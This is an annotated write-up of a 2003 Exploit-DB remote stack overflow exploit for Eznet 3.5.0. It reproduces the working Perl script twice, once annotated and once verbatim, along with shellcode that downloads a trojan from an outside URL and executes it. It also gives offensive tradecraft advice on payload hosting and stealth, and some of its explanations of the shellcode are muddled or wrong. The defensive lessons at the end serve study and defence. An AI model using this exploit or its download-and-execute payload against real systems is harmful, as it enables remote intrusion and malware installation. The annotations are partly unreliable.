Exploiting Eznet 3.5.0: A Deep Dive into Remote Stack Overflow and Trojan Download

What this paper is

This paper details a remote stack overflow vulnerability in Eznet version 3.5.0. The exploit, written in Perl, leverages this vulnerability to overwrite the program's execution flow. Its primary goal is to download and execute a trojan from a user-specified URL on the target system. It also includes a secondary "sub-shellcode" which appears to be related to the exploit's execution flow or error handling.

Simple technical breakdown

The Eznet application, when processing a specific network request, has a buffer that is too small to hold the incoming data. By sending a specially crafted, oversized request, an attacker can overwrite this buffer and, crucially, overwrite the return address on the stack. This return address tells the program where to go next after a function finishes. By overwriting it with a malicious address, the attacker can redirect the program's execution to their own injected code (shellcode).

In this case, the injected shellcode is designed to:

1. Find the addresses of necessary Windows API functions (like LoadLibraryA and GetProcAddress) by looking them up in loaded modules.
2. Use these functions to load URLMON.DLL.
3. Use URLMON.DLL to download a specified trojan executable to the target system.
4. Use kernel32.dll's WinExec function to run the downloaded trojan.

The Perl script orchestrates this by:

1. Connecting to the target Eznet service (likely on port 80, the default for HTTP).
2. Constructing a malicious HTTP GET request. This request contains a large amount of padding, the attacker's shellcode, and a specific "return address" that points to the shellcode.
3. Sending this request to the vulnerable Eznet service.

The exploit also mentions strategies for reliability, such as using a "call esp" instruction or a backwards jump, and dynamically calculating offsets for custom URLs. It notes that the exploit causes Eznet to restart, which is a side effect of the crash.

Complete code and payload walkthrough

Let's break down the Perl script and the included assembly code.

Perl Script (eZnetexploit.pl)

#!/usr/bin/perl -w
#
# Stack Overflow in eZnet.exe - Remote Exploit
#
# Will download a trojan from any address which you provide
# on the target system, then will execute the trojan.
#
# For this exploit I have tried several strategies to increase
# reliability and performance:
#
# + Jump to a static 'call esp'
# + Backwards jump to code a known distance from the stack pointer
#    since the stack address seems to change for each version of
#    eznet.
# + Works out the byte difference for custom urls
#    (must be no longer than 254 bytes!!)
# + Causes eznet.exe to restart (not really my choice ;o)
# + Shellcode steals addresses from a static module.
#
# (Shellcode is attached to the bottom of this file!)
#
# - by Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket; # Imports the module for network socket operations.

if(!($ARGV[1])) # Checks if the second command-line argument (URL) is missing.
{
print "\nUsage: eZnetexploit.pl <victim> <url of trojan>\n" . # Prints usage instructions if arguments are missing.
      " + netcat trojan at http://www.elitehaven.net/ncat.exe\n" .
      " + listens on port 9999.\n\n";
exit; # Exits the script.
}

print "eZnet.exe remote trojan downloader exploit\n"; # Prints a banner.

$victim = IO::Socket::INET->new(Proto=>'tcp', # Creates a new TCP socket.
                               PeerAddr=>$ARGV[0], # Sets the target IP address from the first argument.
                               PeerPort=>"80") # Sets the target port to 80 (HTTP).
                           or die "Unable to connect to $ARGV[0] on port 80"; # Handles connection errors.

$tlen = chr(length($ARGV[1]) + 1); # Calculates the length of the trojan URL + 1 (for a null terminator or similar). This will be used in the shellcode.

$shellcode =            "\xEB\x3C\x5F\x55\x89\xE5\x81\xC4" . # Start of the shellcode.
                        "\xE8\xFF\xFF\xFF\x57\x31\xDB\xB3" .
                        "\x07\xB0\xFF\xFC\xF2\xAE\xFE\x47" .
                        "\xFF\xFE\xCB\x80\xFB\x01\x75\xF4" .
                        "\x5F\x57\x8D\x7F\x0B\x57\x8D\x7F" .
                        "\x13\x57\x8D\x7F\x08\x57\x8D\x7F" .
                                                    $tlen  . # Inserts the calculated length of the URL.
                            "\x57\x8D\x7F\x09\x47\x57\x8D" .
                        "\x54\x24\x14\x52\xEB\x02\xEB\x52" .
                        "\x89\xD6\xFF\x36\xFF\x15\x1C\x91" .
                        "\x04\x10\x5A\x52\x8D\x72\xFC\xFF" .
                        "\x36\x50\xFF\x15\xCC\x90\x04\x10" .
                        "\x5A\x52\x31\xC9\x51\x51\x8D\x72" .
                        "\xF0\xFF\x36\x8D\x72\xF4\xFF\x36" .
                        "\x51\xFF\xD0\x5A\x52\xFF\x72\xEC" .
                        "\xFF\x15\x1C\x91\x04\x10\x5A\x52" .
                        "\x8D\x72\xF8\xFF\x36\x50\xFF\x15" .
                        "\xCC\x90\x04\x10\x5A\x52\x31\xC9" .
                        "\x41\x51\x8D\x72\xF0\xFF\x36\xFF" .
                        "\xD0\xCC\xE8\x6B\xFF\xFF\xFF\x55" .
                        "\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C" .
                        "\x4C\xFF\x55\x52\x4C\x44\x6F\x77" .
                        "\x6E\x6C\x6F\x61\x64\x54\x6F\x46" .
                        "\x69\x6C\x65\x41\xFF\x57\x69\x6E" .
                        "\x45\x78\x65\x63\xFF" .  $ARGV[1] . # Inserts the actual trojan URL.
                                                    "\xFF" .
                        "\x63\x3A\x5C\x6E\x63\x2E\x65\x78" .
                        "\x65\xFF\x6B\x65\x72\x6E\x65\x6C" .
                        "\x33\x32\x2E\x64\x6C\x6C\xFF"; # End of shellcode, includes strings for DLLs and functions.

$jmpcode =              "\x89\xE0\x66\x2D\x38\x32\xFF\xE0"; # This is the "sub-shellcode" or jump code.

$eip = "\xBB\x33\x05\x10"; # This is the "return address" that will overwrite the EIP. It points to a location within the shellcode or its vicinity.

$packet = "" . # Constructs the malicious HTTP GET request.
  "GET /SwEzModule.dll?operation=login&autologin=" . # The vulnerable path and parameters.
  "\x90"x65 . # 65 NOP (No Operation) instructions for padding and alignment.
  $shellcode . # The main shellcode.
  "a"x(4375 - length($ARGV[1])) . # Padding with 'a' characters to reach a specific size. The size is calculated to fill the buffer and reach the EIP overwrite.
  $eip . # The attacker-controlled return address.
  "\x90"x20 . # 20 more NOP instructions.
  $jmpcode . # The jump code.
  "\x20HTTP/1.0.User-Agent: SoftwaxAsys/2.1.10\n\n"; # HTTP headers to complete the request.

print $victim $packet; # Sends the crafted packet to the victim.

print " + Making Request ...\n + Trojan should download - best of luck!\n"; # Informative messages.

sleep(4); # Pauses for 4 seconds, likely to allow the exploit to execute on the target.
close($victim); # Closes the socket connection.

print "Done.\n"; # Final message.
exit; # Exits the script.

Shellcode (vampiric.asm - embedded in Perl)

This is the core payload. It's written in x86 assembly and designed to be position-independent.

bits 32 # Specifies 32-bit assembly.

jmp short killnull # Jumps to the 'killnull' label to start execution.

next:
pop edi # 'edi' will hold the address of the data section (strings).

push ebp # Standard function prologue.
mov ebp, esp
add esp, -24 # Allocate space on the stack.

push edi # Push the address of the data section again.

xorebx, ebx # Clear ebx.
mov bl, 07h # Set bl to 7. This is likely a counter for null bytes.
mov al, 0ffh # Set al to 0xFF. This will be used in the scan.

cld # Clear direction flag, so string operations increment pointers.
nullify:
repne scasb # Scans for a byte (0xFF) in the buffer pointed to by 'edi'. It repeats until a non-matching byte is found or 'bl' becomes 0. This loop is used to find null bytes (0x00) by scanning for 0xFF and incrementing until a 0x00 is found.
inc byte [edi-01h] # Increments the byte *before* the current 'edi' pointer. This effectively replaces the 0x00 byte found by SCASB with a 0x01. This is a way to null-terminate strings or mark boundaries.
dec bl # Decrement the counter.
cmp bl, 01h # Check if the counter is 1.
jne nullify # If not 1, repeat the nullification process.

pop edi # Restore edi.

; --- Finding API addresses ---
push edi		; 'URLMON.DLL' - Pushes the address of the string "URLMON.DLL" onto the stack.
lea edi, [edi+11]	; Points edi to the next string.
push edi		; 'URLDownloadToFileA' - Pushes the address of "URLDownloadToFileA".
lea edi, [edi+19]	; Points edi to the next string.
push edi		; 'WinExec' - Pushes the address of "WinExec".
lea edi, [edi+08]	; Points edi to the next string.
push edi		; 'http://www.elitehaven.net/ncat.exe' - Pushes the address of the trojan URL.
lea edi, [edi+35]	; Points edi to the next string.
push edi		; 'c:\nc.exe' - Pushes the address of the local filename.
lea edi, [edi+09]	; Points edi to the next string.
inc edi			; Adjusts edi to point to the start of the next string.
push edi		; 'kernel32.dll' - Pushes the address of "kernel32.dll".

; --- Preparing for LoadLibraryA ---
lea edx, [esp+20]	; Loads the address of the stack pointer (esp) plus an offset into edx. This offset is calculated to point to the base of the arguments for LoadLibraryA.
push edx		; Pushes the argument for LoadLibraryA (the DLL name).

jmp short over # Jumps to the 'over' label.

killnull:
jmp short data # Jumps to the 'data' label.

over:
; --- Calling LoadLibraryA ---
mov esi, edx		; Copies the address of the argument (DLL name) to esi.
push dword [esi]	; Pushes the actual DLL name string onto the stack.

call [1004911ch]	; Calls LoadLibraryA. The address 0x1004911c is a hardcoded pointer to LoadLibraryA in kernel32.dll. This is a common technique when the exact address of kernel32.dll is not known, but a known function within it is.

pop edx			; Pops the return value of LoadLibraryA (handle to the loaded DLL) into edx.
push edx		; Pushes the DLL handle back onto the stack.

; --- Finding GetProcAddress ---
lea esi, [edx-04]	; Adjusts esi to point to the argument for GetProcAddress (the function name string).
push dword [esi]	; Pushes the function name string ("URLDownloadToFileA").

push eax		; Pushes eax. EAX typically holds the return value of the previous call, which is the DLL handle.

call [100490cch]	; Calls GetProcAddress. The address 0x100490cc is a hardcoded pointer to GetProcAddress in kernel32.dll.

pop edx			; Pops the return value of GetProcAddress (address of URLDownloadToFileA) into edx.
push edx		; Pushes the function pointer back onto the stack.

; --- Preparing for URLDownloadToFileA ---
xor ecx, ecx		; Clears ecx.
push ecx		; Pushes a null argument (for dwFlags).
push ecx		; Pushes a null argument (for lpReserved).
lea esi, [edx-16]	; Points esi to the local file path string ("c:\nc.exe").
push dword [esi]	; Pushes the local file path.
lea esi, [edx-12]	; Points esi to the URL string.
push dword [esi]	; Pushes the URL string.
push ecx		; Pushes a null argument (for lpCallerMoniker).

call eax		; Calls URLDownloadToFileA. EAX holds the address of URLDownloadToFileA obtained from GetProcAddress.

pop edx			; Pops the return value of URLDownloadToFileA into edx.
push edx		; Pushes the return value back onto the stack.

; --- Loading Kernel32.dll again for WinExec ---
push dword [edx-20]	; Pushes the argument for LoadLibraryA ("kernel32.dll").

call [1004911ch]	; Calls LoadLibraryA to load kernel32.dll (again, or to ensure it's loaded).

pop edx			; Pops the return value of LoadLibraryA (handle to kernel32.dll) into edx.
push edx		; Pushes the handle back onto the stack.

; --- Finding WinExec ---
lea esi, [edx-08]	; Points esi to the function name string ("WinExec").
push dword [esi]	; Pushes the function name string.
push eax		; Pushes the kernel32.dll handle.

call [100490cch]	; Calls GetProcAddress to get the address of WinExec.

pop edx			; Pops the return value of GetProcAddress (address of WinExec) into edx.
push edx		; Pushes the function pointer back onto the stack.

; --- Preparing for WinExec ---
xor ecx, ecx		; Clears ecx.
inc ecx			; Sets ecx to 1 (for the nCmdShow argument, typically SW_SHOWNORMAL).
push ecx		; Pushes the nCmdShow argument.

lea esi, [edx-16]	; Points esi to the local file path string ("c:\nc.exe").
push dword [esi]	; Pushes the command line argument (the path to the downloaded trojan).

call eax		; Calls WinExec. EAX holds the address of WinExec.

int3			; Triggers a breakpoint (interrupt 3). This is often used for debugging or as a way to halt execution if the exploit reaches this point.

ta:
call next # Jumps back to the 'next' label to process the data section.
db 'URLMON.DLL',0ffh # String data, followed by 0xFF.
db 'URLDownloadToFileA',0ffh
db 'WinExec',0ffh
db 'http://www.elitehaven.net/ncat.exe',0ffh # The default trojan URL.
; The comments explain how to adjust the offsets if the URL or filename changes.
db 'c:\nc.exe',0ffh # The default local filename for the trojan.
db 'kernel32.dll',0ffh

Explanation of Shellcode Logic:

1. Initialization (jmp short killnull, next: pop edi): The shellcode starts by jumping over some initial setup code. The next label is where the main execution resumes. pop edi stores the address of the data section (strings like DLL names, function names, URLs) into edi.
2. Null Byte Handling (nullify loop): This section is a bit unusual. It seems to be designed to find null bytes (0x00) within the data section and replace them with 0x01. The repne scasb instruction scans for a byte that doesn't match al (which is 0xFF). When it finds a 0x00, edi points after it. inc byte [edi-01h] then modifies the byte before edi, effectively changing the 0x00 to 0x01. This is a peculiar way to "nullify" or mark string boundaries, possibly to avoid issues with null bytes in certain contexts or to prepare strings for specific API calls. The bl counter limits this to 7 such replacements.
3. Argument Preparation: The code then pushes the addresses of various strings onto the stack: URLMON.DLL, URLDownloadToFileA, WinExec, the trojan URL, the local filename (c:\nc.exe), and kernel32.dll. These are arguments for subsequent API calls.
4. Loading URLMON.DLL:
   • It prepares arguments for LoadLibraryA by pushing the address of the kernel32.dll string.
   • It calls LoadLibraryA using a hardcoded address ([1004911ch]). This function loads the specified DLL into the process's memory and returns a handle to it.
5. Getting URLDownloadToFileA Address:
   • It prepares arguments for GetProcAddress by pushing the address of the URLDownloadToFileA string and the handle to kernel32.dll.
   • It calls GetProcAddress using a hardcoded address ([100490cch]). This function returns the memory address of the specified function within the loaded DLL.
6. Downloading the Trojan:
   • It prepares arguments for URLDownloadToFileA: a null pointer for lpCallerMoniker, the URL of the trojan, the local filename (c:\nc.exe), and null pointers for dwFlags and lpReserved.
   • It calls URLDownloadToFileA using the address obtained from GetProcAddress. This function downloads the file from the URL to the specified local path.
7. Loading kernel32.dll (again): It repeats the LoadLibraryA call for kernel32.dll. This might be to ensure the handle is available or to retrieve it again if it was overwritten.
8. Getting WinExec Address:
   • Similar to step 5, it uses GetProcAddress to find the address of the WinExec function within kernel32.dll.
9. Executing the Trojan:
   • It prepares arguments for WinExec: the command line (the path to the downloaded c:\nc.exe) and nCmdShow (set to 1, meaning show the window).
   • It calls WinExec using the address obtained from GetProcAddress. This function executes the downloaded trojan.
10. Termination (int3): The int3 instruction is a breakpoint. If the exploit reaches this point, it will halt execution.

Sub-Shellcode (subcode.asm)

bits 32

mov eax, esp
sub ax, 3238h
jmp eax

Explanation:

• mov eax, esp: Copies the current stack pointer to eax.
• sub ax, 3238h: Subtracts 0x3238 from the lower 16 bits of eax (which is ax). This effectively moves the stack pointer back by a specific amount.
• jmp eax: Jumps to the address now held in eax.

This sub-shellcode appears to be a small piece of code that adjusts the stack pointer and then jumps to that adjusted location. Its exact purpose in relation to the main exploit is not explicitly detailed in the comments, but it's likely used to control the execution flow or to jump to a specific point after the main shellcode has completed its task or encountered an issue. It's placed after the main shellcode in the exploit packet.

Exploit-DB Code Fragment Mapping

• #!/usr/bin/perl -w: Shebang line, indicates the script should be executed with Perl.
  • Practical Purpose: Script interpreter directive.
• use IO::Socket;: Imports the Perl module for network socket programming.
  • Practical Purpose: Enables network communication for the exploit.
• if(!($ARGV[1])) { ... }: Command-line argument check.
  • Practical Purpose: Ensures the attacker provides the target IP and trojan URL.
• $victim = IO::Socket::INET->new(...): Establishes a TCP connection to the target.
  • Practical Purpose: Connects to the vulnerable Eznet service.
• $tlen = chr(length($ARGV[1]) + 1);: Calculates URL length for shellcode insertion.
  • Practical Purpose: Dynamically sizes the shellcode based on the provided URL.
• $shellcode = ... $tlen ... $ARGV[1] ...: The main shellcode assembly bytes.
  • Practical Purpose: The malicious payload that performs the trojan download and execution.
• $jmpcode = "\x89\xE0\x66\x2D\x38\x32\xFF\xE0";: The "sub-shellcode" bytes.
  • Practical Purpose: Likely a control flow adjustment or secondary payload.
• $eip = "\xBB\x33\x05\x10";: The target return address.
  • Practical Purpose: Overwrites the return address on the stack to redirect execution.
• $packet = "GET /SwEzModule.dll?operation=login&autologin=" . ...: Constructs the malicious HTTP request.
  • Practical Purpose: The data sent over the network to trigger the vulnerability.
• "\x90"x65: NOP sled (65 bytes).
  • Practical Purpose: Provides a buffer for the execution flow to slide into the shellcode, increasing reliability.
• "a"x(4375 - length($ARGV[1])): Padding to fill the buffer.
  • Practical Purpose: Fills the remaining space in the overflow buffer up to the EIP overwrite.
• "\x90"x20: Additional NOPs after the EIP overwrite.
  • Practical Purpose: Further padding, potentially to align execution before the jump code.
• print $victim $packet;: Sends the crafted packet.
  • Practical Purpose: Transmits the exploit payload to the target.
• sleep(4); close($victim);: Waits and closes the connection.
  • Practical Purpose: Allows time for the exploit to run on the target and cleans up the connection.
• Assembly code blocks (e.g., jmp short killnull, pop edi, call [1004911ch], db 'URLMON.DLL',0ffh): These are the actual machine instructions and data for the shellcode.
  • Practical Purpose: The executable logic that runs on the target machine.

Practical details for offensive operations teams

• Required Access Level: Remote, unauthenticated access to the target system's network. The Eznet service is assumed to be exposed and listening.
• Lab Preconditions:
  • A vulnerable Eznet 3.5.0 instance running on a Windows target. This is critical as the exploit targets a specific version.
  • Network connectivity from the attacker's machine to the target's Eznet service port (defaulting to port 80).
  • The target machine must be able to reach the URL where the trojan is hosted (e.g., http://www.elitehaven.net/ncat.exe). If the target is behind a strict firewall that blocks outbound HTTP, the download will fail.
• Tooling Assumptions:
  • Perl interpreter installed on the attacker's machine to run the exploit script.
  • A network listener (like netcat or socat) on the attacker's machine to receive connections from the downloaded trojan if it's designed to connect back.
  • A web server hosting the trojan executable at the specified URL.
• Execution Pitfalls:
  • Version Specificity: The exploit is highly likely to be specific to Eznet 3.5.0. Newer versions or different configurations will probably not be vulnerable.
  • Network Evasion/Firewalls: The exploit uses standard HTTP (port 80). Network Intrusion Detection Systems (NIDS) or firewalls might detect the unusual GET request or the large payload.
  • Trojan Host Availability: If the URL hosting the trojan is down or inaccessible from the target, the exploit will fail to download the payload.
  • Antivirus/Endpoint Protection: Modern antivirus software will likely detect the shellcode or the downloaded trojan executable.
  • Stack Layout Variations: While the exploit attempts to be robust, variations in Windows versions, service packs, or other loaded DLLs could subtly alter the stack layout, potentially causing the hardcoded addresses for LoadLibraryA and GetProcAddress to be incorrect, leading to failure. The comment about the stack address changing for each version of eznet suggests this was a known challenge.
  • Buffer Size Mismatch: The padding calculation (4375 - length($ARGV[1])) is crucial. If the actual buffer size or the offset to the return address is different in the target environment, the EIP overwrite will fail.
  • Service Restart: The exploit causes the Eznet service to crash and restart. This is a noticeable side effect that could alert administrators.
• Tradecraft Considerations:
  • Stealth: Sending a large, unusual HTTP GET request might be logged by web servers or firewalls.
  • Payload Hosting: The trojan must be hosted on a reliable, accessible server. Using a domain that doesn't immediately raise suspicion is advisable.
  • Post-Exploitation: The downloaded trojan's behavior is unknown beyond it being a "trojan." Its capabilities (e.g., reverse shell, keylogger, botnet agent) will dictate the next steps.
  • Obfuscation: The shellcode itself is not heavily obfuscated, making it potentially detectable by signature-based AV.

Where this was used and when

• Context: This exploit targets the Eznet application suite, which included products like eZmeeting, eZnetwork, eZphotoshare, eZshare, and eZ. These were likely used for collaboration, file sharing, or communication.
• Timeframe: Published on December 15, 2003. This indicates the vulnerability existed and was exploited around or before this date. Such exploits were common in the early to mid-2000s as software security practices were less mature.
• Usage: It's highly probable that this exploit was used in targeted attacks against organizations using the vulnerable Eznet software. The goal was to gain initial access to download and execute malware, likely for further network compromise, data theft, or establishing persistence.

Defensive lessons for modern teams

• Patch Management: The most fundamental lesson is the importance of keeping software up-to-date. This exploit targets a specific, old version (3.5.0). Regularly patching applications, especially network-facing services, is paramount.
• Input Validation: Developers must rigorously validate all user-supplied input, especially data received over the network. Insufficient buffer size checks are a classic vulnerability.
• Secure Coding Practices: Employing secure coding guidelines and using static/dynamic analysis tools during development can help identify and prevent buffer overflows and other memory corruption vulnerabilities.
• Network Segmentation and Firewalls: Restricting network access to only necessary services and ports can limit the attack surface. Even if a service is vulnerable, if it's not exposed externally, remote exploitation is impossible.
• Endpoint Detection and Response (EDR): Modern EDR solutions can detect suspicious process behavior, such as unexpected network connections, file downloads, or the execution of unknown binaries, even if the initial exploit is successful.
• Application Whitelisting: Preventing unauthorized executables from running on endpoints can stop the downloaded trojan from executing, even if the exploit itself succeeds.
• Logging and Monitoring: Comprehensive logging of network traffic and application events can help detect anomalous activity, such as unusually large HTTP requests or service crashes.

ASCII visual (if applicable)

This exploit involves a client-server interaction and a process execution flow.

+-----------------+       +-------------------+       +-----------------+
| Attacker Machine| ----> | Target Eznet      | ----> | Target OS       |
| (Perl Exploit)  |       | Service (vulnerable)|       | (Trojan Exec)   |
+-----------------+       +-------------------+       +-----------------+
        |                        |                            |
        | 1. Send Malicious      |                            |
        |    HTTP Request        |                            |
        |                        |                            |
        |                        | 2. Buffer Overflow occurs  |
        |                        |    -> EIP overwrite        |
        |                        |                            |
        |                        | 3. Shellcode execution     |
        |                        |    (Download & Execute)    |
        |                        |                            |
        |                        | 4. Download Trojan from    |
        |                        |    Attacker's URL          |
        |                        |                            |
        |                        | 5. Execute Trojan          |
        |                        |                            |
        |                        |                            |
        +------------------------+----------------------------> (Trojan Connects Back?)

Explanation of Diagram:

1. The attacker's machine runs the Perl script, which connects to the target Eznet service.
2. A specially crafted HTTP GET request is sent. This request is too large for a buffer in the Eznet service, causing a stack buffer overflow.
3. The overflow overwrites the return address (EIP) on the stack, redirecting execution to the attacker's shellcode.
4. The shellcode executes on the target machine. It uses Windows API functions to download a trojan executable from a URL provided by the attacker.
5. Finally, the shellcode uses WinExec to run the downloaded trojan. The trojan's behavior would then depend on its design (e.g., establishing a reverse shell back to the attacker).

Source references

• Paper ID: 133
• Paper Title: Eznet 3.5.0 - Remote Stack Overflow / Denial of Service
• Author: Peter Winter-Smith
• Published: 2003-12-15
• Keywords: Windows, remote
• Paper URL: https://www.exploit-db.com/papers/133
• Raw Exploit URL: https://www.exploit-db.com/raw/133

Original Exploit-DB Content (Verbatim)

#!/usr/bin/perl -w
# 
# Stack Overflow in eZnet.exe - Remote Exploit
# 
# Will download a trojan from any address which you provide
# on the target system, then will execute the trojan.
# 
# For this exploit I have tried several strategies to increase
# reliability and performance:
# 
# + Jump to a static 'call esp'
# + Backwards jump to code a known distance from the stack pointer
#    since the stack address seems to change for each version of
#    eznet.
# + Works out the byte difference for custom urls
#    (must be no longer than 254 bytes!!)
# + Causes eznet.exe to restart (not really my choice ;o)
# + Shellcode steals addresses from a static module.
# 
# (Shellcode is attached to the bottom of this file!)
#
# - by Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket;

if(!($ARGV[1]))
{
print "\nUsage: eZnetexploit.pl <victim> <url of trojan>\n" .
      " + netcat trojan at http://www.elitehaven.net/ncat.exe\n" .
      " + listens on port 9999.\n\n";
exit;
}

print "eZnet.exe remote trojan downloader exploit\n";

$victim = IO::Socket::INET->new(Proto=>'tcp',
                               PeerAddr=>$ARGV[0],
                               PeerPort=>"80")
                           or die "Unable to connect to $ARGV[0] on port 80";

$tlen = chr(length($ARGV[1]) + 1);

$shellcode =            "\xEB\x3C\x5F\x55\x89\xE5\x81\xC4" .
                        "\xE8\xFF\xFF\xFF\x57\x31\xDB\xB3" .
                        "\x07\xB0\xFF\xFC\xF2\xAE\xFE\x47" .
                        "\xFF\xFE\xCB\x80\xFB\x01\x75\xF4" .
                        "\x5F\x57\x8D\x7F\x0B\x57\x8D\x7F" .
                        "\x13\x57\x8D\x7F\x08\x57\x8D\x7F" .
                                                    $tlen  .
                            "\x57\x8D\x7F\x09\x47\x57\x8D" .
                        "\x54\x24\x14\x52\xEB\x02\xEB\x52" .
                        "\x89\xD6\xFF\x36\xFF\x15\x1C\x91" .
                        "\x04\x10\x5A\x52\x8D\x72\xFC\xFF" .
                        "\x36\x50\xFF\x15\xCC\x90\x04\x10" .
                        "\x5A\x52\x31\xC9\x51\x51\x8D\x72" .
                        "\xF0\xFF\x36\x8D\x72\xF4\xFF\x36" .
                        "\x51\xFF\xD0\x5A\x52\xFF\x72\xEC" .
                        "\xFF\x15\x1C\x91\x04\x10\x5A\x52" .
                        "\x8D\x72\xF8\xFF\x36\x50\xFF\x15" .
                        "\xCC\x90\x04\x10\x5A\x52\x31\xC9" .
                        "\x41\x51\x8D\x72\xF0\xFF\x36\xFF" .
                        "\xD0\xCC\xE8\x6B\xFF\xFF\xFF\x55" .
                        "\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C" .
                        "\x4C\xFF\x55\x52\x4C\x44\x6F\x77" .
                        "\x6E\x6C\x6F\x61\x64\x54\x6F\x46" .
                        "\x69\x6C\x65\x41\xFF\x57\x69\x6E" .
                        "\x45\x78\x65\x63\xFF" .  $ARGV[1] .
                                                    "\xFF" .
                        "\x63\x3A\x5C\x6E\x63\x2E\x65\x78" .
                        "\x65\xFF\x6B\x65\x72\x6E\x65\x6C" .
                        "\x33\x32\x2E\x64\x6C\x6C\xFF";

$jmpcode =              "\x89\xE0\x66\x2D\x38\x32\xFF\xE0";

$eip = "\xBB\x33\x05\x10";

$packet = "" .
  "GET /SwEzModule.dll?operation=login&autologin=" .
  "\x90"x65 . $shellcode . "a"x(4375 - length($ARGV[1])) . $eip . "\x90"x20 . $jmpcode .
  "\x20HTTP/1.0.User-Agent: SoftwaxAsys/2.1.10\n\n";
                  
print $victim $packet;

print " + Making Request ...\n + Trojan should download - best of luck!\n";

sleep(4);
close($victim);

print "Done.\n";
exit;

#-----------------------------[vampiric.asm]------------------------------
# ; 'eZnet.exe' (eZmeeting, eZnetwork, eZphotoshare, eZshare, eZ)
# ;   (cryptso.dll vampiric shellcode)
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; [peter4020@hotmail.com]
# 
# bits 32
# 
# jmp short killnull
# 
# next:
# pop edi
# 
# push ebp
# mov ebp, esp
# add esp, -24
# 
# push edi
# 
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
# 
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
# 
# pop edi
# 
# push edi		; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi		; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi		; 'WinExec'
# lea edi, [edi+08]
# push edi		; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi		; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi		; 'kernel32.dll'
# 
# lea edx, [esp+20]
# push edx
# 
# jmp short over
# killnull:
# jmp short data
# over:
# 
# mov esi, edx
# push dword [esi]
# 
# call [1004911ch]	; LoadLibraryA
# 
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
# 
# push eax
# 
# call [100490cch]	; GetProcAddress("URLMON.DLL", URLDownloadToFileA);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16]	; file path
# push dword [esi]
# lea esi, [edx-12]	; url
# push dword [esi]
# push ecx
# 
# call eax
# 
# pop edx
# push edx
# 
# push dword [edx-20]
# 
# call [1004911ch]	; LoadLibraryA
# 
# pop edx
# push edx
# 
# 
# lea esi, [edx-08]
# push dword [esi]	; 'WinExec'
# push eax		; kernel32.dll handle
# 
# call [100490cch]	; GetProcAddress("kernel32.dll", WinExec);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# inc ecx
# push ecx
# 
# lea esi, [edx-16]	; file path
# push dword [esi]
# 
# call eax
# 
# int3
# 
# ta:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ;   db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ;   push edi		; 'http://www.elitehaven.net/ncat.exe'
# ;   lea edi, [edi+35]
# ; and make it:
# ;   push edi		; 'http://www.site.com/someguy/trojan.exe'
# ;   lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
#-------------------------------------------------------------------------

#------------------------------[subcode.asm]------------------------------
# ; eZnet.exe Sub-Shellcode
# ; [peter4020@hotmail.com]
# 
# ;100533BBh
# 
# bits 32
# 
# mov eax, esp
# sub ax, 3238h
# jmp eax
#-----------------------------------------------




# milw0rm.com [2003-12-15]